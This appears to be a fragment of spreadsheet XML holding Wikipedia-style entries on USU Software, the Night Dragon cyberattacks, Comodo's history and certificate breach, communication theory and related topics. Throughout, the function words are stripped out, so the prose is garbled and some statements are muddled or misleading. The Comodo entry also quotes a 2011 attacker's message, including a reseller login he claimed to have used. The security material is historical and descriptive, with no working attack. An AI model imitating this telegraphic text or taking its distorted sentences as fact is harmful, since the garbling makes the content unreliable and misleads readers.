    <t>USU Software</t>
  </si>
  <si>
    <t>software headquartered möglingen, germany, holding company various subsidiaries operate international software service companies. company focuses primarily digitalizing customer services. fiscal year 2021, group generated revenue €111.9 million total employees. profit year €6.8 million. software branches germany, united states, france, italy, japan, austria czech republic. listed prime segment frankfurt stock exchange (frankfurt, germany). company history founded 1977 strehl unternehmensberatung headquartered möglingen near stuttgart, germany. company worked area management since 1988. focus since 1995 knowledge management. company floated july 2000. took omega gmbh 2005, leutek gmbh 2006, aspera gmbh 2010 expand product portfolio. group took majority stake social media gmbh, berlin, 2012. aspera technologies inc. founded boston 2013. industrial data research unit also established 2013. securintegration gmbh, cologne, company specializes license management, acquired mid-2015. merged aspera gmbh 2016. beginning 2017, unitb technologies gmbh, full-service agency digital media became member group. 2017, easytrust became first french company acquired group. easytrust, renamed 2017, specializes data center inventory oracle license management. spring 2018, subsidiary changed legal form operating name gmbh. unymira, business segment gmbh, created 2018. focuses digitizing business processes service bundles portfolio four previously independent divisions social media, business solutions, kcenter unitb technology. january 28,2021, group announces would unit subsidiaries common umbrella brand. part branding, aspera gmbh operates technologies gmbh, aspera inc. united states solutions inc. leutek gmbh solutions gmbh. gmbh continue exist legal unit divided areas service management (previously valuemation), digital services solutions knowledge management (previously unymira). group company software france, development company software czech republic also remain unchanged. group 1200 customers, including allianz, basf, group, deutsche telekom, e.on, orange, poste italiane volkswagen. products offers software services customer service management worldwide. references</t>
  </si>
  <si>
    <t>Night Dragon Operation</t>
  </si>
  <si>
    <t>night dragon operation cyberattacks started mid-2006 initially reported dmitri alperovitch, vice president threat research internet security company mcafee august 2011, also named night dragon operation operation aurora cyberespionage intrusion investigations. attacks least organizations, including defense contractors, businesses worldwide, united nations international olympic committee. attack work model attacks variety components—there single piece family malware responsible. preliminary stage attack involves penetration target network, ‘breaking front door’. techniques spear-phishing injection public facing servers reported used. once attackers upload freely available hacker tools onto compromised servers order gain visibility internal network. internal network penetrated typical methods (accessing active directory account details, cracking user passwords, etc.) order infect machines network remote administration trojans (rats). since attack done government, resources terms hardware, software, logistics available hackers considerable (pla unit 61398). references confessions cyber hunter eric winsborrow (tedx)</t>
  </si>
  <si>
    <t>RegTech technician registration</t>
  </si>
  <si>
    <t>regtech project established prospect union promote support professional registration engineering, science technicians membership bodies with technician members across hundreds workplaces sectors ranging defence energy heritage telecoms, union working conjunction membership bodies including professional associations: engineering council, science council, chartered institute engtechnow. entitlement technicians successfully gain professional registration status relevant membership body right display appropriate letters name. case regtech means either engtech, rscitech rittech. title “post nominal” provides formal recognition relevant skills experience. career progression skills prospect believes technician registration means supporting apprentices young professionals structured vocational routes career progression. while valuable asset right provide foundation achieving chartered status. more broadly regtech project aimed helping address skills shortages, raising profile technicians attracting recruits roles. registration process registration exam-based rather achieved providing evidence required knowledge, understanding experience. this varies according relevant professional awarding body often take form written application face face interview, supporting documentation. support prospect’s support technician registration includes workplace surgeries, dedicated online helpdesk training workplace regtech advisers. funding regtech project funded gatsby charitable foundation, whose stated aims strengthen science engineering skills developing innovative programmes informing national policy references</t>
  </si>
  <si>
    <t>Nick Mathewson</t>
  </si>
  <si>
    <t>nick mathewson american computer scientist co-founder project. along roger dingledine, began working onion routing shortly graduated massachusetts institute technology (mit) early 2000s. also known pseudonym nickm. mathewson dingledine focus increased media attention leak nsa's highly classified documents edward snowden, subsequent public disclosure operation xkeyscore, targeted project's onion servers along mixminion remailer mit. education mathewson graduated 2002, earning bachelor science degree computer science. later earned master engineering computer science linguistics mit. works project developed mathewson, along colleagues, contract united states naval research laboratory. mathewson also lead developer responsible security, design, maintenance protocol, along sending security patches. honors mathewson, along developers project (roger dingledine paul syverson), recognized 2012, foreign policy magazine list global thinkers year. selected publications mathewson, nick; dingledine, roger; syverson, paul january 2004). "tor: second-generation onion router". defense technical information center. archived original april 2021. {{cite journal}}: cite journal requires |journal= (help) mathewson, nick; johnson, aaron syverson, paul; dingledine, roger october 2011). trust-based anonymous communication: adversary models routing algorithms. '11. association computing machinery. 175–186. doi:10.1145/2046707.2046729. isbn 9781450309486. s2cid 2543268. mathewson, nick; dingledine, roger 2003). "mixminion: design type anonymous remailer protocol". proceedings 19th international conference data engineering (cat. no.03ch37405). institute electrical electronics engineers. 2–15. doi:10.1109/secpri.2003.1199323. isbn 0-7695-1940-7. s2cid 9924523. references</t>
  </si>
  <si>
    <t>US Cyber Challenge</t>
  </si>
  <si>
    <t>cyber challenge private program recruits, trains, places candidates cybersecurity jobs united states. cyber challenge formerly s&amp;t-funded not-for-profit organization, currently program center internet security. history founding director cyber challenge karen evans. methodology cyber challenge uses online competition april select qualified candidates one-week cybersecurity training program following summer. summer program includes workshops, fair, capture flag competition. topics covered workshops include intrusion detection, penetration testing forensics. participation limited high school college students citizens. references external links official site cyber challenge twitter</t>
  </si>
  <si>
    <t>Comodo Cybersecurity</t>
  </si>
  <si>
    <t>comodo security solutions, inc., also known sectigo, cybersecurity company headquartered bloomfield, jersey united states. history company founded 1998 united kingdom melih abdulhayoğlu. company relocated united states 2004. products focused computer internet security. firm operates certificate authority issues certificates. company also helped setting standards contributing ietf (internet engineering task force) certification authority authorization (caa) resource record.in october 2017, francisco partners acquired comodo certification authority (comodo comodo security solutions, inc. francisco partners rebranded comodo november 2018 sectigo. change name came less year comodo acquired francisco partners.on june 2018, organization announced expanding tls/ssl certificates security announcement device security platform. company announced headquarters roseland, jersey july 2018 acquisition codeguard, website maintenance disaster recovery company, august 2018.on june 2020, comodo announced strategic partnership company cybersecop. firm partnered comodo past, seeks provide range cybersecurity products consulting services. companies comodo limited (sectigo): based city salford, greater manchester, digital certificate authority issues digital certificates. november 2018, francisco partners announced comodo certificate authority (comodo rebranding sectigo. comodo security solutions, inc: based clifton, jersey, develops security software commercial consumer use. dns.com: based louisville, kentucky, company provides managed services. industry affiliations comodo member following industry organizations: certificate authority security council (casc): february 2013, comodo became founding member industry advocacy organization dedicated addressing industry issues educating public internet security. common computing security standards forum (ccsf): 2009 comodo founding member ccsf, industry organization promotes industry standards protect users. comodo melih abdulhayoğlu considered founder ccsf. ca/browser forum: 2005, comodo founding member consortium certificate authorities browser vendors dedicated promoting industry standards baseline requirements internet security. melih abdulhayoğlu invited browser providers certification authorities round table discuss creation central authority responsible delivering digital certificate issuance best practice guidelines. products comodo dragon (web browser) comodo dragon (web browser) comodo internet security comodo system utilities comodo mobile security comodo endpoint protection controversies linkedin after competitor commented comodo employee posting comodo "stops malware", company aggressively engaged linkedin, insinuating commenters qualified work cybersecurity, replying majority posts competitor's "started it". symantec response symantec's comment asserting paid antivirus superior free antivirus, comodo group challenged symantec september 2010 whether paid free products better defend consumer malware. gcn's john breeden understood comodo's stance free antivirus software challenging symantec: "this actually pretty smart move based previous reviews performance we've done lab. recent review year showed functional difference free paid programs terms stopping viruses, many years. fact back 2006 find roundup viruses missed companies."symantec responded saying comodo interested product included tests independent reviewers.comodo volunteered symantec comodo independent review. though showdown take place, comodo since included multiple independent reviews av-test, world, best antivirus reviews, av-comparatives, mag. certificate hacking march 2011, comodo posted report days earlier, march 2011, user account affiliate registration authority compromised used create user account issued nine certificate signing requests. nine certificates seven domains issued. attack traced address 212.95.136.18, originates tehran, iran. moxie marlinspike analyzed address website next found english localization. though firm initially reported breach result "state-driven attack", subsequently stated origin attack "result attacker attempting false trail.".the attack immediately thwarted, comodo revoking bogus certificates. comodo also stated actively looking ways improve security affiliates.in update march 2011, comodo stated detected thwarted intrusion reseller user account march 2011. controls implemented comodo following incident march 2011, removed risk fraudulent issue certificates. comodo believed attack perpetrator incident march 2011.in regards second incident, comodo stated, "our infrastructure compromised. keys hsms compromised. certificates fraudulently issued. attempt fraudulently access certificate ordering platform issue certificate failed." march 2011, person username "comodohacker" verified attacker posting private keys online posted series messages detailing poor comodo's security bragging abilities:i hacked comodo instantssl.it, ceo's e-mail address mfpenco@mfpenco.com their comodo username/password was: user: gtadmin password: globaltrust their name was: globaltrust instantsslcms enough said, huh? yes, enough said, someone know already knows... anyway, first mention relation iranian cyber army, change dnses, hack own. comodo wrote managed attack, planned attack, group cyber criminals etc. explain: group, single hacker experience 1000 hacker, single programmer experience 1000 programmer, single planner/project manager experience 1000 project managers, right, managed 1000 hackers, experience 1000 hackers.such issues widely reported, criticism certificates issued revoked. 2016, certificates remain revoked. microsoft issued security advisory update address issue time event.for comodo's lacking response issue computer security researcher moxie marlinspike called whole event extremely embarrassing comodo rethinking security. also implied attacker followed online video tutorial searched basic opsecsuch attacks unique comodo specifics vary many entities, trusted default, holes deemed inevitable. association privdog february 2015, comodo associated man-in-the-middle enabling tool known privdog, claims protect users malicious advertising.privdog issued statement february 2015, saying, minor intermittent defect detected third party library used privdog standalone application potentially affects small number users. this potential issue present privdog versions, 3.0.96.0 3.0.97.0. potential issue present privdog plug-in distributed comodo browsers, comodo distributed version users. potentially maximum 6,294 users 57,568 users globally could potentially impact. third party library used privdog third party library used superfish....the potential issue already corrected. there update tomorrow automatically update 57,568 users specific privdog versions." certificates issued known malware distributors 2009 microsoft michael burgess accused comodo issuing digital certificates known malware distributors. comodo responded notified revoked certificates question, used sign known malware. chromodo browser, acl, aslr, weak authentication january 2016, tavis ormandy reported comodo's chromodo browser exhibited number vulnerabilities, including disabling same-origin policy.the vulnerability browser itself, based open-source code behind google's chrome browser. rather, issue add-on. soon comodo became aware issue early february 2016, company released statement fix: industry, software general always updated, patched, fixed, addressed, improved goes hand hand development cycle...what critical software development companies address issue certain vulnerability found ensuring never puts customer risk." those using chromodo immediately received update. chromodo browser subsequently discontinued comodo. ormandy noted comodo received "excellence information security testing" award verizon despite vulnerability browser, despite delivered default weak authentication, despite enabling address space layout randomization (aslr), despite using access control lists (acls) throughout product. ormandy opinion verizon's certification methodology fault here. let's encrypt trademark registration application october 2015, comodo applied "let's encrypt", "comodo let's encrypt", "let's encrypt comodo" trademarks. these trademark applications filed almost year internet security research group, parent organization let's encrypt, started using name let's encrypt publicly november 2014, despite fact comodo's "intent use" trademark filings acknowledge never used "let's encrypt" brand. june 2016, comodo publicly posted forum filed "express abandonment" trademark applications.comodo's chief technical officer robin alden said, "comodo filed express abandonment trademark applications time instead waiting allowing lapse. following collaboration let's encrypt comodo, trademark issue resolved behind we'd like thank let's encrypt team helping bring resolution." dangling markup injection vulnerability july 2016, matthew bryant showed comodo's website vulnerable dangling markup injection attacks send emails system administrators comodo's servers approve wildcard certificate issue request used issue arbitrary wildcard certificates comodo's 30-day positivessl product.bryant reached june 2016, july 2016, comodo's chief technical officer robin alden confirmed place, within responsible disclosure date industry standards. also comparison antivirus software comparison computer viruses internet security comparison firewalls references external links official website</t>
  </si>
  <si>
    <t>Communication</t>
  </si>
  <si>
    <t xml:space="preserve">communication (from latin: communicare, meaning share" relation with") apparent answer painful divisions self other, private public, inner thought outer world." definition indicates, communication difficult define consistent manner, common refers wide range different behaviours involved propagation information. john peters argues difficulty defining communication emerges fact communication universal phenomenon (because everyone communicates) specific discipline institutional academic study.one definitional strategy involves limiting included category communication (for example, requiring "conscious intent" persuade). logic, possible definition communication developing meaning among entities groups sufficiently mutually understood signs, symbols, semiotic conventions. claude shannon's warren weaver's influential model, human communication imagined function like telephone telegraph. accordingly, conceptualized communication involving discrete steps: formation communicative motivation reason. message composition (further internal technical elaboration exactly express). message encoding (for example, digital data, written text, speech, pictures, gestures on). transmission encoded message sequence signals using specific channel medium. noise sources natural forces cases human activity (both intentional accidental) begin influencing quality signals propagating sender receivers. reception signals reassembling encoded message sequence received signals. decoding reassembled encoded message. interpretation making sense presumed original message.these elements understood substantially overlapping recursive activities rather steps sequence. example, communicative actions commence communicator formulates conscious attempt case phatics; likewise, communicators modify intentions formulations message response real-time feedback (e.g., change facial expression). practices decoding interpretation culturally enacted, individuals (genre conventions, instance, trigger anticipatory expectations message received), receivers message operationalize frames reference interpretation.the scientific study communication divided into: information theory studies quantification, storage, communication information general; communication studies concerns human communication; biosemiotics examines communication living organisms general. biocommunication exemplifies sign-mediated interactions organisms domains life, including viruses.communication realized visually (through images written language), auditory, tactile/haptic (e.g. braille physical means), olfactory, electromagnetic, biochemical means combination thereof). human communication unique extensive abstract language. types non-verbal communication nonverbal communication explains processes convey type information form non-linguistic representations. examples nonverbal communication include haptic communication, chronemic communication, gestures, body language, facial expressions, contact etc. nonverbal communication also relates intent message. examples intent voluntary, intentional movements like shaking hand winking, well involuntary, sweating. speech also contains nonverbal elements known paralanguage, e.g. rhythm, intonation, tempo, stress. affects communication subconscious level establishes trust. likewise, written texts include nonverbal elements handwriting style, spatial arrangement words emoticons convey emotion. nonverbal communication demonstrates paul watzlawick's laws: cannot communicate. once proximity formed awareness, living creatures begin interpreting signals received. some functions nonverbal communication humans complement illustrate, reinforce emphasize, replace substitute, control regulate, contradict denotative message. nonverbal cues heavily relied express communication interpret others' communication replace substitute verbal messages. there several reasons non-verbal communication plays vital role communication: "non-verbal communication omnipresent." they included every single communication act. total communication, non-verbal channels body, face, voice, appearance, touch, distance, timing, environmental forces must engaged face-to-face interaction. written communication also non-verbal attributes. e-mails, chats, social media options change text font colours, stationery, emoticons, capitalization, pictures order capture non-verbal cues verbal medium."non-verbal behaviours multifunctional." many different non-verbal channels engaged time communication acts allow chance simultaneous messages sent received. "non-verbal behaviours form universal language system." smiling, crying, pointing, caressing, glaring non-verbal behaviours used understood people regardless nationality. such non-verbal signals allow basic form communication verbal communication effective language barriers. when verbal messages contradict non-verbal messages, observation non-verbal behaviour relied judge another's attitudes feelings, rather assuming truth verbal message alone. verbal communication verbal communication spoken written conveyance message. human language defined system symbols (also known lexemes) grammars (rules) symbols manipulated. word "language" also refers common properties languages. language learning normally occurs intensively human childhood. most large number human languages patterns sound gesture symbols enable communication others around them. languages tend share certain properties, although exceptions. constructed languages esperanto, programming languages, various mathematical formalisms necessarily restricted properties shared human languages. previously mentioned, language characterized symbolic. charles ogden richards developed triangle meaning model explain symbol (the relationship word), referent (the thing describes), meaning (the thought associated word thing). communicators' diverse efforts produce interpret meaning language functionally constrained language's prototypical phonology (sounds typically appear language), morphology (what counts word), syntax (word-order), semantics (conventional meaning words), pragmatics (which meanings conventional contexts). meanings attached words literal, otherwise known denotative; relating topic discussed, meanings take context relationships account, otherwise known connotative; relating feelings, history, power dynamics communicators.contrary popular belief, signed languages world (e.g., american sign language) considered verbal communication sign vocabulary, grammar, linguistic structures abide necessary classifications spoken languages. there however, nonverbal elements signed languages, speed, intensity, size signs made. signer might sign "yes" response question, might sign sarcastic-large slow convey different nonverbal meaning. sign verbal message movements nonverbal meaning message. written communication historical development over time forms ideas communication evolved continuing progression technology. advances include communications psychology media psychology, emerging field study. progression written communication divided three "information communication revolutions": written communication first emerged pictographs. pictograms made stone, hence written communication mobile. pictograms began develop standardized simplified forms. next step occurred writing began appear paper, papyrus, clay, wax, media commonly shared writing systems, leading adaptable alphabets. communication became mobile. final stage characterized transfer information controlled waves electromagnetic radiation (i.e., radio, microwave, infrared) electronic signals.communication thus process meaning assigned conveyed attempt create shared understanding. gregory bateson called "the replication tautologies universe. this process, requires vast repertoire skills interpersonal processing, listening, observing, speaking, questioning, analyzing, gestures, evaluating enables collaboration cooperation. communication models lasswells model communication harold lasswell major theorist world communications. however political science student studying propaganda public policy making university chicago studying charles merriam professor political science. graduated university chicago 1922 received ph.d 1926. completed graduate studies university london, paris, berlin geneva. graduate studies argued audience fully understand messages make informed choices political sphere. explored propaganda doctoral dissertation "propaganda technique world (1927) become part communication theory.he professor yale teaching political science 1946 1970 well university chicago 1922 1938. time yale, developed laswell model communication. considered primary founders communication theories, written million million words academic lifetime. helped communications become respected legitimate study.harold lasswell known lasswell model communication, used umbrella term models communication simplicities allow multiple different interpretations theorize with. published "the structure function communication society" essay 1948. lasswell thinking mass media role radio played 1930s. extremely popular second world war.the lasswell model broken five parts-the five w's, focuses "who", "what", "whom", "which channel" "what effect". lasswell brings three functions communication, surveillance environment, correlation components society cultural transmission generation.who, communication person, newspapers, websites, television stations radio stations. this communication developed people organized institutions, reporters, editors etc. says what, refers analyzing identifying content given. whom, audience audience receive information, which channel, refers media going analyzed. interactivity media what effect, refers taken piece information there advantages well critiques mentioned lasswell model. some advantages concept easy simple, suits types communication main concept effect. some scholars believe lasswell model communication longer relevant, although time extremely significant. critiques brought lasswell model concept feedback mention, concept noise mentioned. theories started come make lasswells method factors specially shannon weaver model. another critique lasswell model linear model, goes types communications show back forth experience. also mention power communication process. power highlighted specially sturat halls methods concepts. hall took parts lasswell method started reworking idea power media, power message putting out. hall examines view organizations mass media enforce certain meanings appease agenda. shannon weaver model first major model communication introduced claude shannon warren weaver bell laboratories 1949 original model designed mirror functioning radio telephone technologies. their initial model consisted three primary parts: sender, channel, receiver. sender part telephone person spoke into, channel telephone itself, receiver part phone could hear person. shannon weaver also recognized often static interferes listening telephone conversation, deemed noise. simple model, often referred transmission model standard view communication, information content (e.g. message natural language) sent form spoken language) emitter (emisor picture)/sender/encoder destination/receiver/decoder. this common conception communication simply views communication means sending receiving information. strengths model simplicity, generality, quantifiability. claude shannon warren weaver structured model based following elements: information source, produces message. transmitter, encodes message signals. channel, signals adapted transmission. noise source, distorts signal propagates channel. receiver, 'decodes' (reconstructs) message signal. destination, message arrives.shannon weaver argued three levels problems communication within theory. technical problem: accurately message transmitted? semantic problem: precisely meaning conveyed? effectiveness problem: effectively received meaning affect behavior?daniel chandler critiques transmission model stating: assumes communicators isolated individuals. allowance differing purposes. allowance differing interpretations. allowance unequal power relations. allowance situational contexts.in 1960, david berlo expanded shannon weaver's (1949) linear model communication created smcr model communication. sender-message-channel-receiver model communication separated model clear parts expanded upon scholars. communication usually described along major dimensions: message (what type things communicated), source/emisor/sender/encoder (from whom), form form), channel (through medium), destination/receiver/target/decoder whom). wilbur schram (1954) also indicated also examine impact message (both desired undesired) target message. between parties, communication includes acts confer knowledge experiences, give advice commands, questions. these acts take many forms, various manners communication. form depends abilities group communicating. together, communication content form make messages sent towards destination. target oneself, another person being, another entity (such corporation group beings). communication seen processes information transmission three levels semiotic rules: pragmatic (concerned relations signs/expressions users). semantic (study relationships signs symbols represent). syntactic (formal properties signs symbols).therefore, communication social interaction least interacting agents share common signs common semiotic rules. this commonly held rule sense ignores autocommunication, including intrapersonal communication diaries self-talk, secondary phenomena followed primary acquisition communicative competences within social interactions. light weaknesses, barnlund (2008) proposed transactional model communication. basic premise transactional model communication individuals simultaneously engaging sending receiving messages. slightly complex form sender receiver linked reciprocally. this second attitude communication, referred constitutive model constructionist view, focuses individual communicates determining factor message interpreted. communication viewed conduit; passage information travels individual another information becomes separate communication itself. particular instance communication called speech act. sender's personal filters receiver's personal filters vary depending upon different regional traditions, cultures, gender; alter intended meaning message contents. presence "communication noise" transmission channel (air, case), reception decoding content faulty, thus speech achieve desired effect. problem encode-transmit-receive-decode model processes encoding decoding imply sender receiver possess something functions codebook, code books are, least, similar identical. although something like code books implied model, nowhere represented model, creates many conceptual difficulties. theories coregulation describe communication creative dynamic continuous process, rather discrete exchange information. canadian media scholar harold innis theory people different types media communicate choose offer different possibilities shape durability society. famous example using ancient egypt looking ways built media different properties stone papyrus. papyrus called 'space binding'. made possible transmission written orders across space, empires enables waging distant military campaigns colonial administration. stone 'time binding', construction temples pyramids sustain authority generation generation, media change shape communication society. academic discipline distinct fields study academic discipline deals processes human communication communication studies. discipline encompasses range topics, face-to-face conversation mass media outlets television broadcasting. communication studies also examines messages interpreted political, cultural, economic, semiotic, hermeneutic, social dimensions contexts. statistics, quantitative approach communication science, also incorporated research communication science order help substantiate claims. organizational communication business communication used wide variety activities including, limited strategic communications planning, media relations, internal communications, public relations (which include social media, broadcast written communications, more), brand management, reputation management, speech-writing, customer-client relations, internal/employee communications. companies limited resources choose engage activities, larger organizations employ full spectrum communications. since relatively difficult develop broad range skills, communications professionals often specialize areas usually least working knowledge them. far, important qualifications communications professionals must possess excellent writing ability, good 'people' skills, capacity think critically strategically. business communication could also refer style communication within given corporate entity (i.e. email conversation styles, internal communication styles). classical approach: classical approach comes management theory frederick taylor founder scientific management theory well. main idea classical approach organizational communication theory compares organizations machine. theory observed analyze workers perform task given order contribute overall well-being organization. each member purpose group, like part machine works tasks cooperate parts well-managed, functioning machine. additionally, like machine collapse part fails function. organization fall apart members designated task appropriately.the human relation approach: human relation approach based several different theorists elton mayo, mcgregors's douglas, abraham maslow, mary parker follett's argyris. main idea human relation approach organizational communication theory compares organizations family. theory compares organization family, focuses workers satisfaction relationship within organizations compared work performance element. human relation approach emphasizes importance employee attitudes, encourage organizations management team focus interpersonal relationships, group dynamics, leadership styles achieving organizational effectiveness. political communication communication relevant tools political strategies, including persuasion propaganda. mass media research online media research, effort strategist getting precise decoding, avoiding "message reactance", message refusal. reaction message referred also terms approach message, follows: "radical reading" audience rejects meanings, values, viewpoints built text makers. effect: message refusal. "dominant reading", audience accepts meanings, values, viewpoints built text makers. effect: message acceptance. "subordinate reading" audience accepts, large, meanings, values, worldview built text makers. effect: obey message.holistic approaches used communication campaign leaders communication strategists order examine options, "actors" channels generate change semiotic landscape, change perceptions, change credibility, change "memetic background", change image movements, candidates, players managers perceived influencers role generating desired "end-state". modern political communication field highly influenced framework practices "information operations" doctrines derive nature strategic military studies. according view, really relevant concept acting information environment. information environment aggregate individuals, organizations, systems collect, process, disseminate, information. this environment consists three interrelated dimensions, continuously interact individuals, organizations, systems. these dimensions known physical, informational, cognitive. interpersonal communication simple terms, interpersonal communication communication person another others). often referred face-to-face communication more) people. both verbal nonverbal communication, body language, play part person understands another, attribute one's soft skills. verbal interpersonal communication types messages sent: content message relational message. content messages messages topic hand relational messages messages relationship itself. this means relational messages come across says something demonstrates person's feelings, whether positive negative, towards individual talking indicating feel topic hand, also feel relationship individual.there many different aspects interpersonal communication including: audiovisual perception communication problems. concept follows idea words change form take based stress level urgency situation. also explores concept stuttering speech shows audience problem situation stressful. attachment theory. this combined work john bowlby mary ainsworth (ainsworth bowlby, 1991) this theory follows relationships builds mother child, impact relationships others. emotional intelligence triggers. emotional intelligence focuses ability monitor ones emotions well others. emotional triggers focus events people tend intense, emotional reactions within individuals. attribution theory. this study individuals explain causes different events behaviors. power words (verbal communications). verbal communication focuses heavily power words, words said. takes consideration tone, volume, choice words. nonverbal communication. focuses heavily setting words conveyed well physical tone words. ethics personal relations. space mutual responsibility individuals, giving receiving relationship. this theory explored dawn lipthrott article what relationship? what ethical partnership? deception communication. this concept goes everyone lies, impact relationships. this theory explored james hearn article interpersonal deception theory: lessons negotiators. conflict couples. this focuses impact social media relationships, well communicate conflict. this theory explored amanda lenhart maeve duggan paper couples, internet, social media. family communication family communication study communication perspective broadly defined family, intimacy trusting relationship. main goal family communication understand interactions family pattern behaviors family members different circumstances. open honest communication creates atmosphere allows family members express differences well love admiration another. also helps understand feelings another. family communication study looks topics family rules, family roles family dialectics factors could affect communication family members. researchers develop theories understand communication behaviors. family communication study also digs deep certain time periods family life marriage, parenthood divorce communication stands situations. important family members understand communication trusted leads well constructed family. rhetoric according scholar anne beaufort, communication also interested rhetoric method investigating "oral written communications, particularly regard desired effect audience, lately, visual communications well." barriers effectiveness barriers effective communication distort message intention message conveyed. this result failure communication process cause effect undesirable. these include filtering, selective perception, information overload, emotions, language, silence, communication apprehension, gender differences political correctness.this also includes lack expressing "knowledge-appropriate" communication, occurs person uses ambiguous complex legal words, medical jargon, descriptions situation environment understood recipient. physical barriers physical barriers often nature environment. example natural barrier exists workers located different buildings different sites. likewise, poor outdated equipment, particularly failure management introduce technology, also cause problems. staff shortages another factor frequently causes communication difficulties organization. system design system design faults refer problems structures systems place organization. examples might include organizational structure unclear therefore makes confusing know communicate with. other examples could inefficient inappropriate information systems, lack supervision training, lack clarity roles responsibilities lead staff uncertain expected them. attitudinal barriers– attitudinal barriers come result problems staff organization. these brought about, example, factors poor management, lack consultation employees, personality conflicts result people delaying refusing communicate, personal attitudes individual employees lack motivation dissatisfaction work, brought insufficient training enable carry particular tasks, simply resistance change entrenched attitudes ideas. ambiguity words/phrases words sounding different meaning convey different meaning altogether. hence communicator must ensure receiver receives meaning. better words avoided using alternatives whenever possible. individual linguistic ability jargon, difficult inappropriate words communication prevent recipients understanding message. poorly explained misunderstood messages also result confusion. however, research communication shown confusion lend legitimacy research persuasion fails. physiological barriers these result individuals' personal discomfort, caused—for example—by health, poor eyesight hearing difficulties. bypassing this happens communicators (the sender receiver) attach symbolic meanings words. sender expressing thought word receiver gives different meaning. example- asap, rest room. technological multi-tasking absorbency with rapid increase technologically driven communication past several decades, increasingly faced condensed communication form e-mail, text, social updates. this has, turn, notable change younger generations communicate perceive self-efficacy communicate connect others. with ever-constant presence another "world" one's pocket, individuals multi-tasking physically cognitively constant reminders something else happening somewhere else bombard them. though perhaps advancement long-term effects, notion currently explored figures sherry turkle. fear criticized this major factor prevents good communication. exercise simple practices improve communication skill, become effective communicators. example, read article newspaper collect news television present front mirror. this boost confidence also improve language vocabulary. gender barriers there potential agenda communicators. this notable among different genders. example, women could found critical addressing conflict could noted likely women withdraw conflict. noise communication model, noise interference decoding messages sent channel encoder. there many examples noise: environmental noise. noise physically disrupts communication, standing next loud speakers party, noise construction site next classroom making difficult hear professor. physiological-impairment noise. physical maladies prevent effective communication, actual deafness blindness preventing messages received intended. semantic noise. different interpretations meanings certain words. example, word "weed" interpreted undesirable plant yard, euphemism marijuana. syntactical noise. mistakes grammar disrupt communication, abrupt changes verb tense sentence. organizational noise. poorly structured communication prevent receiver accurate interpretation. example, unclear badly stated directions make receiver even lost. cultural noise. stereotypical assumptions cause misunderstandings, unintentionally offending non-christian person wishing "merry christmas". psychological noise. certain attitudes also make communication difficult. instance, great anger sadness cause someone lose focus present moment. disorders autism also severely hamper effective communication.to face communication noise, redundancy acknowledgement must often used. acknowledgements messages addressee informing originator his/her communication received understood. message repetition feedback message received necessary presence noise reduce probability misunderstanding. disambiguation regards attempt reducing noise wrong interpretations, semantic value meaning sign subject noise, presence multiple meanings, makes sense-making difficult. disambiguation attempts decrease likelihood misunderstanding. this also fundamental skill communication processes activated counselors, psychotherapists, interpreters, coaching sessions based colloquium. information technology, disambiguation process automatic disambiguation meanings words sentences also interest concern since earliest days computer treatment language. cultural aspects cultural differences exist within countries (tribal/regional differences, dialects on), religious groups organisations organisational level companies, teams units different expectations, norms idiolects. families family groups also experience effect cultural barriers communication within different family members groups. example: words, colours symbols different meanings different cultures. parts world, nodding head means agreement, shaking head means "no", true everywhere.communication great extent influenced culture cultural variables. understanding cultural aspects communication refers knowledge different cultures order communicate effectively cross culture people. cultural aspects communication great relevance today's world global village, thanks globalisation. cultural aspects communication cultural differences influence communication across borders. verbal communication refers form communication uses spoken written words expressing transferring views ideas. language important tool verbal communication. countries different languages. knowledge languages different countries improve cross-cultural understanding. non-verbal communication wide concept includes forms communication written spoken words. verbal communication takes following forms: paralinguistics elements language voice involved communication includes tones, pitch, vocal cues etc. also includes sounds throat greatly influenced cultural differences across borders. proxemics deals concept space element communication. proxemics explains four zones spaces, namely intimate, personal, social public. this concept differs culture culture permissible space varies different countries. artifactics studies verbal signals communication emerges personal accessories dress fashion accessories worn varies culture people different countries follow different dress codes. chronemics deals time aspects communication also includes importance given time. some issues explaining concept pauses, silences response interaction. this aspect communication also influenced cultural differences well known great difference value given different cultures time. kinesics mainly deals body language postures, gestures, head nods, movements, etc. different countries, gestures postures used convey different messages. sometimes even particular kinesic indicating something good country negative meaning another culture.so order effective communication across world desirable knowledge cultural variables effecting communication. according michael walsh ghil'ad zuckermann, western conversational interaction typically "dyadic", particular people, contact important speaker controls interaction; "contained" relatively short, defined time frame. however, traditional aboriginal conversational interaction "communal", broadcast many people, contact important, listener controls interaction; "continuous", spread longer, indefinite time frame. nonhuman every information exchange living organisms i.e. transmission signals involve living sender receiver considered form communication; even primitive creatures corals competent communicate. nonhuman communication also include cell signaling, cellular communication, chemical transmissions primitive organisms like bacteria within plant fungal kingdoms. animals broad field animal communication encompasses issues ethology. animal communication defined behavior animal affects current future behavior another animal. study animal communication, called semiotics (distinguishable anthroposemiotics, study human communication) played important part development ethology, sociobiology, study animal cognition. animal communication, indeed understanding animal world general, rapidly growing field, even 21st century far, great share prior understanding related diverse fields personal symbolic name use, animal emotions, animal culture learning, even sexual conduct, long thought well understood, revolutionized. plants fungi communication observed within plant organism, i.e. within plant cells plant cells, plants related species, plants non-plant organisms, especially root zone. plant roots communicate rhizome bacteria, fungi, insects within soil. recent research shown microorganism plant communication processes neuron-like. plants also communicate volatiles exposed herbivory attack behavior, thus warning neighboring plants. parallel </t>
  </si>
  <si>
    <t>Register of data controllers</t>
  </si>
  <si>
    <t>register data controllers united kingdom database control information commissioner's office mandated data protection 1998. register payers name equivalent register data protection 2018, implements european union's general data protection regulation (gdpr). registration acts carries fee, proceeds fund information commissioner's office. entry inspected public time cost enquirer. data protection 1998 under 1998 act, name data controller recorded purpose(s) processing data processed controller within meaning act.a data controller may, circumstances, exempt registration (previously termed notification). when exempt, failure notify information commissioner's office formally start processing data strict liability offence prosecution brought information commissioner's office criminal court failure notify criminal offence unless exempt. exemption registration exempt data controller compliance act. amendments data controller's notification could made time, must made start processing purpose. data protection 2018 under 2018 act, register called register payers, purposes processing supplied, though trading names name data protection officer given.the enforcement information commissioner's office supported data protection charge data controllers data protection (charges information) regulations 2018. exemptions charge left broadly 1998 act: largely businesses non-profits internal core purposes (staff members, marketing accounting), household affairs, public purposes, non-automated processing. under 2018 enforcement regime registration changed criminal civil monetary penalties. references external links register payers, entry inspected charge.</t>
  </si>
  <si>
    <t>Next Generation Identification</t>
  </si>
  <si>
